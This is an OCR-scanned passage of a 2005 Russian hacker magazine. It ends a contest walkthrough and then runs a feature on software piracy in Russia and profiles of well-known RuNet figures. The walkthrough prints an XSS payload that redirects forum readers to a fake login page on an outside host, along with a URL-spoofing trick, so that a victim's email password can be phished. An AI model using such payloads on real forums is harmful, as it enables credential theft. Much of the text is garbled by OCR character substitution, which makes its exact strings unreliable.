Несложно понять, какая выполнится команда, если вместо $зиЬ]есІ вставить указанную выше 
последовательность символов. 

Некоторые люди, которые проходили конкурс, зачем-то на этом этапе заливали ѵѵеЬ-шелл; неко- 
торые бакланы вообще удаляли весь сайт. А делать надо было следующее: получить из важно- 
го сценария мыло, по которому отправляются данные, и попробовать его поломать. Сделав саХ 
іпсіех.ріір ты бы легко узнал, что все данные из формы летят на мыло Ьотза.іоіШдтаіісот. По- 
ломать это мыло — вот основная задача. Вбив его в ісц-поиске, можно было найти нужный кон- 
такт. И іпіо этого юзера было прямым текстом написано, что он читает все сообщения в борде 
и /ѵѵѵѵ.ісд.сот/ЬоагсІз/Ьгоѵѵзе_{оІсІег.рІір?ІісІ=8085 и любит пофлеймить. Вполне, на мой взгляд, ло- 
гично, что надо найти дырку в этом форуме и через нее утащить пароль. 

Это вот никто довольно долго сделать не мог, хотя баг был на самой поверхности. Стоило толь- 
ко при создании темы вбить любой тэг, как сразу становилось понятно, что этот форум подвер- 
жен СЗЗ-багу. Подробности этой уязвимости и историю ее обнаружения тебе лучше почитать в 
статье в этом номере, я расскажу только, что надо было сделать. 

Необходимо было создать тему, при заходе в которую происходит редирект на поддельную стра- 
ницу авторизации на форуме, размещенную на левом хосте. Что-то вроде того: 

<зсгірЫосаІіоп.ІігеІ= , [іир://хакер.ги/Іо.р[ір , </зсгірЬ 

Еще надо было заспуфить этот реальный адрес, хотя бы таким образом: ѵѵѵѵѵѵ.ісд.сот/іаіаіпо- 
больше символ ов)/Іодіп .ріір @ хакер . ги/іо.ріір 

Доверчивый Федя прочел бы твое сообщение и без проблем ввел бы свой пароль в левую фор- 
му, после чего в твои руки попал бы пароль к его почте, где находилось письмо с информацией 
о ѴРЫ-аккаунте, который выступал в роли приза за прохождение этого конкурса. 

Как видишь, не нужно было быть гуру, чтобы пройти этот конкурс. Первым и единственным победите- 
лем, который получил в свои руки ѴРІ\І-аккаунт сроком действия на месяц стал чувак с ником ЗИАпКаВ. 
Если ты очень хочешь ѴРЫ-акк, но пройти конкурс не сумел, не отчаивайся. Ты можешь просто 
купить, обратившись, например, к сервису #992148. 

Что касается следующего конкурса, то вся информация о нем будет размещена в форуме на 
ѵѵѵѵѵѵ. хакер. ги. Числа двадцатого заваливайся туда и принимай участие! © 








Продолжение тактической стратегии 

о самом известном спецподраздежнии России 
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Пираты XXI века 

ЕСЛИ ТЫ ПОДУМАЛ, ЧТО РЕЧЬ В ЭТОЙ СТАТЬЕ 
ПОЙДЕТ О СУРОВЫХ МУЖИКАХ, У КОТОРЫХ 
ВМЕСТО НОГИ ТОРЧИТ ДЕРЕВЯШКА, А НА ГЛАЗ 
НАТЯНУТА ЧЕРНАЯ ПОВЯЗКА, ТЫ ОШИБСЯ. 
ВРЕМЕНА, КОГДА МОРЯМИ ПРАВИЛИ ПИРАТЫ, 
ДАВНО ПРОШЛИ. ДА И МОРЯ ТЕПЕРЬ СОСТОЯТ 
НЕ ТОЛЬКО ИЗ ВОДЫ, НО И ИНФОРМАЦИИ, И В 
ТАКОЙ СРЕДЕ ПРОМЫШЛЯЮТ ПИРАТЫ СОВСЕМ 
ДРУГОГО ТИПА. ИМЕННО О НИХ МОЙ РАССКАЗ 

I Дмитриев Данил ака хЫІ (5Ігеат@о5коІпе1.ги) 

Как работает 

подпольное 

производство? 

[как рождалось пиратство в России] 

По поводу компьютерного пиратства существу- 
ет два мнения. Некоторые говорят, что пират- 
ство — это зло, тормоз российской ІТ-индуст- 
рии, так как наши разработчики и так еле-еле 
стоят на ногах, а пираты, воруя и продавая их 
софт, наносят сокрушительный удар. Другие, 
наоборот, утверждают, что именно благодаря 
пиратам Россия прославилась компьютерными 
спецами, и именно благодаря пиратам в Рос- 
сии очень много грамотных людей. Но давай 
разбираться по порядку. 

Свое начало пиратство берет с 1902 года. 
Именно тогда стали появляться подпольные 
цеха по производству поддельных виниловых 
пластинок. Прибыльность такого бизнеса была 
сомнительной. Из-за дороговизны материала 
для изготовления виниловых пластинок конт- 




рафактный продукт оказывался не намного дешевле легального, к тому 
же пиратские виниловые диски не копировались с одного на другой. 
Пластинки содержали популярные песни в исполнении неизвестных 
певцов, косивших под звезд эстрады, качество записи оставляло же- 
лать лучшего. В то время проблема пиратства широко обсуждалась в 
музыкальных газетах, и, как и сейчас, в первую очередь, обвиняли Рос- 
сию, которую считали родиной пиратства. В 1911 году был принят ряд 
законов, запрещающих производство и сбыт контрафактного винила. 
Но насколько эффективными были эти законы остается гадать, так как 
произошедшая революция свела производство пластинок на нет. Дол- 
гие годы после этого на ниве пиратства происходило затишье. Советс- 
кий Союз, где любые проявления предпринимательской деятельности 
строго наказывались, стал худшим местом для любителей нелегальной 
продукции. Так продолжалось вплоть до начала 90-х годов. 

После распада Союза, когда Россия вступила в рыночную экономику, пе- 
ред коммерсантами открылось непаханое поле возможностей. Государ- 
ство не успевало обеспечить потребителей товарами и услугами, поэтому 
любое грамотно организованное дело приносило солидную прибыль. Кто- 
то подался в олигархи, кто-то — в челноки. Челноки обычно торговали 
одеждой из-за границы (причем еще при советской власти), но теперь, во 
времена свободной торговли, ввозить из-за бугра можно было любой то- 
вар, в том числе и компакт-диски. Конечно, в условиях экономического 
кризиса наивно было бы предполагать, что люди, в одночасье потеряв- 
шие все, раскошелятся на дорогущий буржуйский софт. Поэтому челноки 
пришли к выводу, что гораздо проще закупить по одному экземпляру про- 
дукта и тиражировать его самостоятельно. Вложившись в технику для из- 





готовления компактов, люди, которых мы сейчас 
называем пиратами, приступили к заполнению при- 
лавков российских компьютерных магазинов. Как и среди 
представителей других видов бизнеса, между пиратами велась жесткая 
конкуренция. Чтобы привлечь пользователя к своей продукции, пираты не 
только старались любыми способами раньше конкурентов достать новый 
варез, но и дорабатывали его, создавали свои узнаваемые бренды. При- 
мером тому может послужить серия дисков «Золотой Софт», самых расп- 
ространенных «реаниматоров» в нашей стране. Чего только не впихива- 
ли пираты на один компакт: и винду, свежий М3 СШісе, и еще добрый де- 
сяток мелких, но не дешевых системных утилит. Чем успешнее подборка 
софта, тем выше шанс хорошо заработать и убрать с дороги конкурентов. 
Как истинные разработчики, пираты заботились о качестве своей продук- 
ции: проверяли диски на вирусы, нанимали программистов для написания 
красивого авторана, скидывали на компакт доки к каждой софтине. Одна 
зараженная вирем программа могла отбить у покупателей охоту покупать 
даже самые «вкусные» диски, а кривой авторан навсегда мог испортить 
впечатление о продукции «компании». 

Следующим шагом стала локализация софта. Русским юзерам гораздо 
удобнее работать с программой на русском языке — пираты это понимали 
— и, как следствие, вскоре стали появляться коробки с подписями: «Русская 
версия» и «2 в 1 . Русская и Английская версия». Локализовать софт было не 
так сложно, но долго. Поэтому для ускорения процесса нанимались целые 
группы профессиональных переводчиков, которые стахановскими темпами 
переводили одну программу за другой. Большие прибыли позволяли хоро- 
шо платить за этот труд. Для локализации некоторых компьютерных игр 
приглашались даже артисты из Союз Мультфильма. Помимо русификато- 
ров в директорию с программой выкладывались еще и крэки. Действитель- 
но, кому нужен софт, который работает только 30 дней? Тут все оказалось 
намного проще, чем с локализацией: крэки и ключи уже давно лежали в Ин- 
тернете и скачать их можно было абсолютно бесплатно. Правда, ходят слу- 
хи, что крупные крэкерские группы целиком и полностью коммерческие и 
финансируются пиратами, но, скорее всего, такие случае единичны. 
Первоначально весь софт пираты именно привозили из-за бугра, а не прос- 
то качали из Интернета. Поэтому дома у каждого челнока лежали десятки 
коробок с лицензионным ПО. Видимо, совершенно случайно кто-то из них 
решил выставить на прилавок легальную коробочную версию. И свой поку- 
патель нашелся. Одних привлекала яркая коробка и дополнительные мате- 
риалы, другие присматривали подарок любимому чаду, были и те, кто из-за 
любви к продукту хотел поощрить таким образом авторов. Поэтому пираты 



решили закупать не по одному экземпляру, как раньше, 
а хотя бы по два-три, непосредственно для продажи. В течение 
месяца вся легальная продукция раскупалась, что привело к созданию 
отдельных магазинов, торгующих чисто лицензионной продукцией. Их бы- 
ло не много, но они были и приносили доход. Стало ясно — продавать ли- 
цензионный софт в России дело не бесполезное, что дало хороший толчок 
российским разработчикам софта и игрушек. Что самое интересное, мно- 
гие группы девелоперов финансировались все теми же пиратами, которые 
в погоне за прибылью не пожалели денег и на них. И это было оправданно, 
тем более, что российские разработки пираты экспортировали за границу. 

[пиратство сегодня] Прошло уже 10 лет, а пиратство не только не 
исчезло как явление, но, наоборот, набирает обороты. На экране теле- 
визора высокие чины говорят о том, что это плохо, что будут бороться, 
что через буквально пару лет пиратство сократится вдвое. На самом де- 
ле, все это пустые слова. С пиратами в нашей стране никто не борется 
и бороться не собирается. Подобные заявления делаются обычно после 
нажима американцев и Евросоюза. Так, например, перед вступлением 
России во Всемирную Торговую Организацию, членства в которой наша 
страна добивалась несколько лет, было сделано несколько заявлений 
дяденьками в погонах и самим премьер-министром о вреде пиратства и 
о мерах его противодействия. Было 
проведено несколько арестов, пока- 
зательных раскатываний дисков по 
асфальту, репортажей с централь- 
ного ТВ. Но дальше этого дело не 
пошло. Арестованные отделались 
штрафами и были отпущены, точки 
заработали вновь, причем в тех же 
местах. Ни разу не было случаев, 
когда оперативники накрывали 
целый завод по изготовлению 
дисков. А ведь если это сделать, 
то на бизнесе определенной груп- 
пы можно ставить крест. Поче- 
му? Читай дальше. 

Пиратские диски произво- 
дятся двумя методами. Пер- 
вый метод — кустарный. 

Главный плюс его — просто- 



[хакер 11 [83] 05 > СЦЕНА 084 ] 



та, минус — маленькая мощность. Суть состоит в том, что диски печата- 
ются прямо на съемной квартире на специальном оборудовании. Мате- 
риал для тиражирования берется из Интернета и с дисков других пира- 
тов. Обычно всем этим заправляет один человек. Иногда он же все это 
и продает. К поставкам нового вареза такие торговцы часто привлека- 
ют молодежь. Забиваешь инте- 
ресным софтом диск, создаешь 
авторан к нему, дизайнишь об- 
ложку и несешь к кустарнику, ко- 
торый платит тебе за труды день- 
ги. Дают, можно сказать, копейки: 
в Москве за один СО — 250 руб- 
лей, за ЭѴЭ — 850. Иногда такие 
торговцы занимаются модифика- 
цией игровых приставок. Г рубо го- 
воря, это прошивка в приставку 
специального чипа, который поз- 
воляет считывать пиратские дис- 
ки. Как известно, приставка Золу 
РІауЗіаІіоп 2 в оригинале не про- 
игрывала пиратскую продукцию, 
однако несложный моддинг это 
легко исправлял. Модифициро- 
ванная приставка стоит, естест- 
венно, дороже оригинальной. 

Это всего лишь мелкие торговцы, 
серьезнее обстоят дела с про- 
мышленными гигантами. На тер- 
ритории России зарегистрировано 

29 заводов по тиражированию носителей и практически 
все они в разное время были уличены в незаконном тира- 
жировании пиратской продукции. Происходит это так. 
Компания-производитель ПО заключает договор с заво- 
дом о выпуске компакт-дисков тиражом в 20 тыс. экземп- 
ляров. Завод заказ выполняет, сдает, но работа на этом не оста- 
навливается. В ночную смену делается дополнительный тираж 
в 40 тыс. экземпляров и расходится по пиратским лоткам. 

Иногда на такие заводы приходят сотрудники милиции, но пе- 
ред тем как пройти на завод, они обязаны доказать охране 
предприятия свои полномочия и показать ордер на обыск. На 
это уходит час-два. Этого времени более чем достаточно, чтобы 
перенастроить производство на тиражирование лицензии. Да и по- 
добные визиты происходят лишь на те заводы, которые успели уличить. 
Если постараться, спрятать цех по нарезке болванок можно даже в не- 
большом городе. И никто не придерется — главное вовремя платить за 
аренду помещения. Процесс производства дисков очень дешевый. Сам 
диск стоит около 0.8$, упаковка и запись — чуть дороже, плюс неболь- 
шие отчисления крышующим структурам. Есть еще затраты на транс- 
портировку, взятки и прочие издержи, но они себя окупают с лихвой. 

В какой-то момент тиражирования обычного контента пиратам показа- 
лось мало, началась настоящая гонка за редкими и эксклюзивными ма- 
териалами. На рынке стали появляться диски, содержащие выкачанные 
из Сети сайты, подборки фотоклипартов, тематические энциклопедии. 
Спустя еще несколько лет появились диски с базами данных. Помнится, 
каких-то четыре года назад я купил диск с телефонным справочником 
своего городка и даже не догадывался, что эту базу выкрали у телефо- 
нистов. Хотя БД с телефонными номерами — это ерунда по сравнению 
с некоторыми другими. Например, были случаи, когда мошенники про- 
бивали по базе угнанных автомобилей хозяев дорогих иномарок, пред- 
лагали выкупить машину за полцены. Деньги брали, а авто так и оста- 
валось в угоне. Недавно на прилавках появились даже диски с БД нало- 
говой инспекцией! Теперь любой человек запросто узнает твой и мой 
уровень доходов. Какие могут быть последствия, догадайся сам. Стоят 
такие диски намного дороже обычных, но это не мешает их успешной 
продаже. А откуда они берутся — тоже догадаться несложно. Продаж- 
ные сотрудники милиции есть, наверное, в каждом отделении. 

[антипиратские кампании] Несмотря на безнадежность противос- 
тояния пиратам, определенные меры все-таки принимаются. Например, 
в Москве несколько лет назад приняли постановление, согласно которо- 
му компьютерные диски запрещено продавать в лотках, а на каждый эк- 
земпляр должна ставиться специальная марка. Эта мера не понрави- 
лась федеральной антимонопольной службе, и поэтому ее отмели. Объ- 
яснялось это несовершенностью закона и невозможностью в полной ме- 
ре его реализовать. Например, запрещая курьерскую торговлю ком- 
пакт-дисков, правительство Москвы поставило вне закона большинство 
интернет-магазинов, доставляющих товары курьером. Также антипира- 



тские организации признали неэффективность введенных марок, ведь 
ответственность за их отсутствие не неслась. Как я уже говорил выше, 
России выгоднее делать вид, что она борется с пиратами, чем делать 
это на самом деле. А притворяться приходится, чтобы избежать санкций 
со стороны США. Россия включена в топ списка самых подверженных 

пиратству стран, и Америка посто- 
янно требует ужесточения антипи- 
ратских мер. То же касается Багамс- 
ких островов, Кувейта, Индии и 
Пакистана. Крупные владельцы 
авторских прав, такие как ВІАА, 
выступая перед конгрессом, заяв- 
ляют, что из-за России они несут 
убытки в 1 ,3 миллиарда долларов 
ежегодно. К тому же Россия экс- 
портируют пиратскую продукцию в 
26 стран мира, что наносит еще 
больший убыток. Интересно то, 
как они считают убытки — берут 
количество проданных пиратских 
дисков и умножают их на цену ле- 
гальной продукции. Исходя из 
этой логики, если бы не было пи- 
ратов, то пользователи покупали 
бы такое же количество дисков, но 
у правообладателей. Разумеется, 
это бред. Если 10 тысяч пиратских 
дисков с ѴѴіпХР по цене 70 р. за 
штуку расходятся в небольшом го- 
родке за месяц, рассчитывать на такой же темп отно- 
сительно легальной продукции, которая стоит за сот- 
ню баксов, просто наивно. А ведь некоторые програм- 
мы достигают стоимости в 10 тысяч долларов. Компа- 
нии-правообладатели, пытаясь сократить случаи во- 
ровства их продуктов, предпринимают разные меры: спонсируют 
антипиратские рейды, подают в суд на заводы, уличенные в свя- 
зях с пиратами, и выделяют кучу денег на донесение через рек- 
ламу угроз любителям халявки. Другой подход избрала 
МісгозоК, где борьба с пиратством имеет программный харак- 
тер. Компания Гейтса не гоняется за частными пользователями, 
но если в крупной фирме решили юзать пиратскую винду, и об 
этом узнали в МісгозоК, фирме этой придется не один месяц побегать 
по судам и заплатить не одну тысячу баксов штрафа. Поэтому в США 
редко можно встретить на фирме пиратский софт, в то время как в Рос- 
сии в использовании нелегального ПО признался даже Дмитрий Чепчу- 
гов, глава отдела «К». 

Сколько бы не говорили эксперты, что государство «крышует» пиратов, 
крупные задержания все-таки происходят. Так, например, месяц назад 
в Самаре на одном из подпольных складов изъяли около миллиона СО, 
упаковочную технику, акцизные марки. Стоимость этой партии оценили 
в 100 — 150 млн. рублей, что уже проходит по статье 146 («нарушение 
авторских и смежных прав в особо крупных размерах») и простым штра- 
фом пиратам не отделаться. Хотя юристы утверждают, что невозможно 
за несколько дней провести оценку такой партии — только опись могла 
занять несколько лет. Да и программный рынок Самары невелик, обо- 
рот в 300 тыс. дисков более правдоподобен, чем миллион. 

[будущее] В последнее время наблюдается интересная тенденция. В 
связи со снижением цен на оргтехнику, число персоналок в нашей стра- 
не увеличивается с каждым годом. По логике, уровень пиратства дол- 
жен расти прямо пропорционально росту количества компов, но этого не 
происходит. Возможно, все дело в учете уровня пиратства. Ведь право- 
защитные организации составляют свои отчеты по уровню рыночных 
продаж пиратской продукции. А вот скачивания вареза с фтп-серверов 
в отчеты не входит, вряд ли можно дать этом правдивую оценку. Уро- 
вень пиратства даже снижается на несколько процентов ежегодно. Это 
характерно не только для России, но и для всего мира. Правда, пока мы 
не вылезли из экономической ямы, говорить о том, что пиратство сой- 
дет на нет, глупо. 

Реально повлиять на ситуацию могут сами разработчики, многие из ко- 
торых не понимают, что снижение цен на их софт увеличит долю легаль- 
ных продаж. Те, кто смотрит на вещи трезво, не грезят миллиардными 
прибылями и устанавливают доступные российскому пользователю це- 
ны. Например, компания «Агава» продает свой антиспамовый фильтр 
за 15 долларов, а антивирус Касперского можно купить за 30 американс- 
ких рублей. Если ты можешь себе это позволить, не поскупись вложить 
деньги в наших кодеров. Многие программы стоят своих денег 0 



ПИРАТСТВО ЗА РУБЕЖОМ 

Пиратства за рубежом меньше, чем в России. Конечно, объе- 
мы не те, да и не продают пиратские диски в открытую, как у 
нас. В остальном — те же подпольные цеха и съемные кварти- 
ры. Законодательство за бугром, как известно, намного жестче 
по отношению к пиратам, но и демократические свободы там 
охраняются на более высоком уровне. Поэтому тамошние по- 
лисмены не могут просто так ворваться к тебе в хату. На это 
нужна куча бумажек, получить которые не всегда легко. Забу- 
горные пираты осторожнее российских коллег, многие из них 
продают товар только через Интернет. Год назад в Испании 
произошел любопытный случай. Полиция повязала пиратов и 
изъяла более 10 тысяч копий пиратской винды. Но если про- 
дукцию наших пиратов отличить от лицензионной очень легко 
(отсутствие упаковки и папочка сгаск в корне диска), то под- 
делка испанцев удивила даже оперативников. Пираты тща- 
тельно скопировали не только коробку, но голограмму и дру- 
гие виды защиты. Выдавалось все это за лицензию и продава- 
лась по соответственной цене. За две недели работы пираты 
срубили несколько миллионов долларов. 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ [СЦЕНА] ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВРІІМ НЬЮСЫ 





РУНЕТ УЖЕ ДАВНО ВЫРОС ИЗ ТЕСНОГО 
СООБЩЕСТВА, ГДЕ ВСЕ ДРУГ ДРУГА 
ЗНАЛИ, ТЕПЕРЬ В НАШЕЙ СТРАНЕ СЕТЬ 
ЮЗАЕТ КАЖДЫЙ ВТОРОЙ. ПО ПОСЛЕД- 
НИМ ДАННЫМ К КОНЦУ 2005 
ГОДА В РОССИИ НАСЧИТЫВАЕТСЯ ОКО- 
ЛО 20 МИЛЛИОНОВ ИНЕТЧИКОВ. ДАЖЕ 
ПЕНСИОНЕРЫ ОЦЕНИЛИ КРУТИЗНУ 
ВИРТУАЛЬНЫХ РАДОСТЕЙ И ТРАТЯТ 
ПЕНСИЮ НА КАРТОЧКИ ОТ ВЭБ-ПЛАС. 
НО, КАК И В ЛЮБОЙ ДРУГОЙ БОЛЬШОЙ 
ТУСОВКЕ, В РУНЕТЕ ЕСТЬ ЛЮДИ, КОТО- 
РЫЕ ОТКРОВЕННО ИЗ НЕЕ ВЫДЕЛЯЮТ- 
СЯ, ЗНАМЕНИТОСТИ, ИМЕНА И ЗАСЛУГИ 
КОТОРЫХ ИЗВЕСТНЫ БОЛЬШЕЙ ЧАСТИ 
РУССКОЙ СЕТИ. ИМЕННО О ТАКИХ 
ЛЮДЯХ Я ТЕБЕ СЕГОДНЯ РАССКАЖУ 

I тіпсІѵѵОгк (тіпсІѵѵОгк@датеІапсІ.ги) 




[Максим Мошков] 

Если собрать все книги, которые хранятся в библиотеке Мошкова и 
распечатать на принтере, бумажной дорожкой из них можно 
запросто опоясать земной шар. Здесь есть все: детективы, 
фантастика, история, поэзия, приключения, зарубежная литература 
и русские произведения, книги известнейших писателей и 
начинающих авторов. Библиотека Максима Мошкова самая 
большая в рунете, ее базой ежедневно пользуются десятки тысяч 
людей. Вряд ли Максим мог предугадать такой размах, когда в 1 993 
году выложил коллекцию электронных книг на своем сайте. 
Коллекция скопилась за долгое время, поэтому была впечатляющей, 
а вот сайт — так себе. Обычная для тех времен хоумпага без особых 
изысков. Максим не планировал делать популярный ресурс для 
книголюбов, получилось это само собой. Кто-то случайно зашел, 
рассказал знакомым... в общем, как это обычно бывает. Правда, в 
1 994 году постоянных читателей еще было не больше десятка, расти 
посещаемость стала после того, как интернет вышел в массы. 
Теперь количество посетителей Шр://ІіЬ.ги составляет более 40 
тысяч в день. Заведует своим сайтом Максим сам, а техподдержкой 
заправляет специально приглашенный программист. Большую роль 
в развитии библиотеки играют сами посетители, присылая новые 
книги. Есть энтузиасты, которые делают это постоянно, 
занимаясь мониторингом новостей литературы и отбирая 
достойные вещи. Многим при первом заходе на либ.ру бросается 
в глаза простоватый, если не сказать больше, дизайн сайта. На 
самом деле, оформление не менялось с 1994 года. «Лень 
переделывать», — жалуется Максим. Впрочем, это не отпугивает 
настоящих ценителей литературы. Есть поисковик, есть 
сортировка по жанрам и авторам, есть рейтинги — что еще надо? 
Отцу сайта часто задают вопрос об авторских правах, на что он 
откровенно отвечает: «Когда есть возможность связаться — 
разрешение спрашиваю». Вообще, за 11 лет существования 
проекта, случаев, когда авторы просили убрать свои работы, 
было не больше двадцати. В то же время отзывов с 
благодарностями от зарубежных читателей, у которых нет 
возможности достать книгу в своей стране, приходит намного 
больше. Случались и неприятные истории. Несколько лет назад 
один автор на словах разрешил Максиму опубликовать его 
творение, после чего подал в суд, ссылаясь на отсутствие 
письменного разрешения. Потребовал миллион рублей за 
моральный ущерб, но после судебной тяжбы, продлившейся 
полтора года, получил три тысячи и «фи» всего рунета. 



[Удав] 

Про культуру падонков (именно через «а») и исІаН.сот я уже писал, 
так что представление ты имеешь. Ты также должен знать, что вер- 
ховным предводителем этой банды является 35-летний Дмитрий Со- 
коловский, известный как Удав. Но дело в том, что Дима широко из- 
вестен не только в контркультурной среде, но и очень знаменитая 
личность в рунете. Хотя бы потому, что удафф.ком — один из самых 
частопосещаемых развлекательных сайтов в России и его явление 
оживленно обсуждается даже передовой интеллигенцией. 

Удав — человек, как ни странно, образованный, семейный, у него 
есть жена, ребенок. Причем жена об увлечении мужа прекрасно 
знает, мало того, периодически заходит на сайт и читает некото- 
рые креативы. Начинал Удав, как и многие контркультурщики, на 
сайте Іиск.ги, писал туда свои первые креативы. А потом в 2000-м 
году решил отделиться и создал собственный проект исІаЯ.сот. 
Первоначально это была скорее домашняя страничка, чем серьез- 
ный проект, но единомышленники оказали хорошую поддержку, и 
ресурс стал стремительно развиваться. За год он вырос из «оче- 
редной КК-хоумпаги» в центральный ресурс падонков сети. Обнов- 
ление на удаве происходит не просто ежедневно, а ежечасно. Ав- 
торы строчат свои «крео» с завидным постоянством, оценивают в 
комментах креативы друг друга, обсуждают насущные проблемы и 
зажигают по полной. «Мы не говорим о свободе слова, мы реаль- 
но делаем ее», — признается Удав в интервью журналистам, а кра- 
сочные слова на «X», «Б» и «П», обильно украшающие сайт, явля- 
ются тому прекрасным доказательством. Хотя я утрирую, ведь все 
уже знают, что мат на удаве не главное, а главное — идея. Если у 
тебя сложилось другое мнение — тебе стоит проникнуться чтением 
ресурса подольше. 

Последнее время, насколько я знаю, Удав не работает, и все свое 
время посвящает проекту. Так как авторов у ресурса много, от- 
фильтровать все присланные креативы занимает кучу времени, в 
то время как единственным источников дохода является реклама с 
баннеров. Кое в чем поддерживать идаЯ.сот помогают несколько 
людей, однако верховная власть принадлежит Удаву, и именно он 
принимает все решения относительно сайта. «ШаІІ.сот — это я», 
— говорит Удав, хотя я бы еще добавил многотысячную армию 
поклонников. В последнее время ресурс все больше привлекает 
СМИ, предводителя даже приглашали на радио «Максимум» (я ту 
передачу, кстати, слушал, и Удав мне показался намного адекват- 
нее ведущих). Словом, интерес к «пелоткам» и «первонахам» у мо- 
лодого поколения растет, что не может не радовать, гы-гы. 






[Артемий Лебедев] 

Артемий Лебедев в области веб-дизайна известен не меньше, чем Путин 
в политических кругах. Этот человек стал одним из первых, кто в начале 
90-х начал дизайнить сайты. Тогда это увлечение было скорее хобби, про- 
фессионально Артемий занимался оформлением печатных изданий в 
собственной арт-студии «Артографика». Но в 1995 году приоритеты сме- 
нились, и Лебедев решил полностью углубиться в веб-дизайн. На паях с 
двумя знакомыми была основана студия ѴѴеЬЭезідп, позднее переимено- 
ванная в «Студию Артемия Лебедева», работа над раскруткой началась. 
Первыми заказчиками были музыкальная группа «Аквариум», для которой 
дизайнеры разработали официальный сайт, интернет-провайдер Віпеі, па- 
ра журналов и радиостанций. К 1997 году студия стала уже известной, ее 
услугами пользовались многие, включая Центральный Банк РФ и поиско- 
вую компанию Уапбех. Раскрутка студии велась самим Лебедевым с по- 
мощью грамотного выстроенного пиара и со временем количество зака- 
зов позволило расширить рабочий коллектив до 100 человек. 

Хотя сейчас в области веб-дизайна «Студия Артемия Лебедева» является 
самым узнаваемым и раскрученным брендом (она единственная, у кото- 
рой есть представительства в других странах), многие профессиональные 
дизайнеры часто подтрунивают над своим конкурентом. Мол, старина Ле- 
бедев в дизайне уже отжил свое и пора бы ему на пенсию. Сам Артемий 
так не считает, на сайте его студии даже есть раздел, где перечисляются 
все его заслуги. Туда входит весь спектр их занятий: от «Делаем сайты» 
до «Сочиняем слоганы». Лебедев также признался, что не приглашает к 
себе тех, кто работает хуже его, а уж свои способности он ценит высоко. 
С именем Артемия Лебедева связано множество скандалов. В 1996 году, 
когда начала свое развитие онлайновая журналистика и появилось множе- 
ство сетевых обозревателей, рунет познакомился с яркой девочкой Катей 
Деткиной. Она стала автором язвительного цикла «Обзирания русского Ин- 
тернета», в рамках которого Катенька делилась своим мнением о посещае- 
мых ею сайтах. Обычно это мнение было однозначным и носило издева- 
тельский характер. В 97-м году в журнале СгагуѴѴеЬ появилась статья, в ко- 
торой Деткину разоблачили и признали виртуальным персонажем, а авто- 
ром его объявили Артемия Лебедева. Сайт студии Лебедева, кстати, был од- 
ним из немногих, о котором Катя отзывалась с большой теплотой. Шумиха 
поднялась грандиозная, Артемия даже пытались привлечь к уголовной отве- 
тственности за оскорбление и клевету на своих конкурентов. Все закончи- 
лось тем, что одним прекрасным днем на страничке «Обзираний» появилась 
трагическая весть: Катюша попала в автокатастрофу и скончалась. 

Также за Лебедевым закрепилась слава киберсквоттера номер один в ру- 
нете, так как он зарегистрировал множество привлекательных доменов и 
выставил их на продажу по космическим ценам (цена на большинство из 
них начинается от 5000$). 



[Алекс Экслер] 

Безусловно, Экслер — самый известный и популярный юмористический 
писатель в рунете. Его перлы были известны еще во времена ФИДО, во 
второй половине 90-х. Правда, тогда они носили характер обычных пос- 
тов в эхоконференции на жизненные темы. Но написано было хорошо, 
людям нравилось, и со временем даже появилась эха РѴТ.ЕХІ_ЕВ — 
приватный клуб читателей. Профессиональным писателем, впрочем, 
Алекс не был. А был компьютерщиком, руководил техотделом и кодил 
программы. В те далекие фидошные времена ходила нашумевшая ис- 
тория о том, что Экслер — на самом деле виртуал, и под этим псевдо- 
нимом пишет целая команда из 6 человек. Целью коварной аферы яко- 
бы было захватить высшую власть в русском ФИДО путем раскрутки 
персонажа. Леонид Каганов, который выступил в роли «обличителя», 
привел тому неоспоримые доказательства. Мол, лучший способ заста- 
вить людей поверить в реальность виртуала — наделить его жизненны- 
ми деталями, а уж кто, как не Экслер, расписывал в ФИДО свои похож- 
дения и похождения своего кота во всех деталях? Или такая непохо- 
жесть его постов... ведь было очевидно, что их писали разные люди! По- 
том уже все узнали, что великое разоблачение Экслера было шуткой 
его друга, но повелись, помнится, многие. 

В конце 90-х, когда Интернет был уже в моде, Алекс забил на ФИДО и 
перебрался в окружение, где возможности для творчества были нес- 
равнимо выше. А 14 января 1999 года появился авторский сайт 
Ехіег.ги. Первое время посетителей было немного, и, чтобы привлечь 
новых людей, Экслер решил писать. Много, часто и разнообразно. Как 
говорит сам Экслер, по природе он человек ленивый, и именно лень 
стала пинком для активных действий. «Я знаю точно, что если не буду 
писать каждый день, то не буду писать и раз в неделю», — объяснил 
он, и придерживается этого правила по сей день, выдавая по 30 — 40 
килобайт в сутки. После публикации нескольких веб-обзоров, юморе- 
сок и новостей, 26 февраля 1999 года на сайте появился первый вы- 
пуск «Дневника Васи Пупкина». Думаю, многие читали цикл «Записки 
жены программиста» — несколько лет назад ссылки на этот текст хо- 
дили по десяткам форумов. Со временем сайт пополнялся новыми 
разделами: «Гороскоп» с забавными предсказаниями, «Баннизмы» со 
стебными иллюстрациями, «Непутевые заметки», где автор повеству- 
ет о своих приключениях за рубежом, познавательные «Кинорецен- 
зии», и это не весь список. Сейчас на Ехіег.ги заходит около 15 тысяч 
человек ежедневно, что совсем неплохо для сайта, который наполня- 
ется одним человеком. Помимо основного своего проекта Алекс успе- 
вает писать для журналов, работать над книгами (он выпустил нес- 
колько компьютерных учебников), вести передачи на радио и колонки 
на других сайтах. 



[ХАКЕР 11 [83] 05 > СЦЕНА 087 ] 
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[Г облин] 

Сомневаюсь, что в рунете остались люди, не смотревшие фильмы в пе- 
реводе Гоблина. «Братство и кольцо», «Шматрица», «С3.14здили»... 
сейчас эти фильмы даже транслируются по центральному телевидению. 
И за каждым из этих переводов стоит один человек — Дмитрий Пучков, 
он же оперуполномоченный Гоблин. 

Родился Дима в 1 961 году в военном городке Кировограда в семье полков- 
ника и учительницы. Так как отца часто переводили на новые места, парень 
успел сменить шесть школ и два интерната. Детство было далеко не радуж- 
ное, Диму чаще воспитывали кнутом, чем пряником. После возвращения из 
армии вместо института он стал работать и сменил дюжину профессий: от 
водителя до гидрогеолога. А в конце 80-х гг. решил, что его призвание — 
охранять закон, и поступил в школу милиции, откуда попал в ГУВД. Работа 
опера отличалась от той, что рисуют в книгах. Приходилось общаться или с 
убитыми горем людьми, или с отпетыми подонками. Но, оглядываясь назад, 
Дмитрий считает эти годы самыми интересными в своей жизни. 

Впервые о Гоблине узнали из статей, которые он писал для игровых 
журналов. В основном об игре Оиаке, которую очень полюбил. Чуть поз- 
же он познакомился с небезызвестным Завхозом и стал графоманить 
